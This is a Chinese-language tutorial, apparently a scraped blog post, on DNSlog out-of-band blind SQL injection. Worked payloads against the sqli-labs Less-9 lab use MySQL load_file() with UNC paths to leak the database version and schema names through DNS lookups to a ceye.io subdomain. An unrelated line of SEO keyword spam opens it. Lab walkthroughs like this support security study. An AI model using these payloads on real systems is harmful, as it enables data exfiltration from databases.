做胃镜多少钱天津津门网站I,wordpress邮箱订阅,抖音小程序电脑上怎么打开,网站横幅广告怎么做Dnslog盲注原理
布尔盲注和时间盲注相当于猜单词的游戏#xff0c;我们需要对每一位逐步的猜测#xff0c;效率很低#xff0c;需要发送很多的请求进行判断#xff0c;很可能会触发安全设备的防护 我们需要一种方式能够减少请求#xff0c;直接回显数据——Dnslog注入 Dn…Dnslog盲注原理
布尔盲注和时间盲注相当于猜单词的游戏我们需要对每一位逐步的猜测效率很低需要发送很多的请求进行判断很可能会触发安全设备的防护 我们需要一种方式能够减少请求直接回显数据——Dnslog注入 Dns在解析的时候会留下日志通过读取多级域名的解析日志获取请求信息
Dnslog盲注方法
登录http://ceye.io/网站并注册得到属于自己的identifier 先尝试在终端运行curl dnslog.4ke30o.ceye.io
Mysql load_file()函数可以发起请求LOAD_FILE()函数操作需要用户具有FILE权限 构造语句利用load_file()函数发起请求使用Dnslog接收请求获取数据 只能在windows系统下使用load_file()发起请求在Linux环境下不能使用load_file()发起请求 使用语句select load_file(concat(\\\\,(select version()),.mysql.4ke30o.ceye.io\\abc)) 在使用前务必记得设置secure_file_priv为我使用的是PHPstudy集成环境所以访问http://localhost/phpMyAdmin4.8.5/来使用SQL 重启mysql服务 使用语句查询自己想要的数据此处查询版本信息 以第九关为例在windows上运行 使用http://localhost/sqli-labs-master/index.html进入SQLInjection页面
http://localhost/sqli-labs-master/Less-9/?id1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20version()),%27.mysql.4ke30o.ceye.io\\abc%27)))--
1
http://localhost/sqli-labs-master/Less-9/?id1%27%20and%20(select%20load_file(concat(%27\\\\%27,(select%20schema_name%20from%20information_schema.schemata%20limit%201,1),%27.mysql.4ke30o.ceye.io\\abc%27)))--
1
一般来说查询不到就说明语法有问题可以先在mysql中尝试在url中务必记得 1、?id1’ and 2、and后面的语句要用括号括起来 3、不要忘记注释掉后面的语句–或者%23 /article
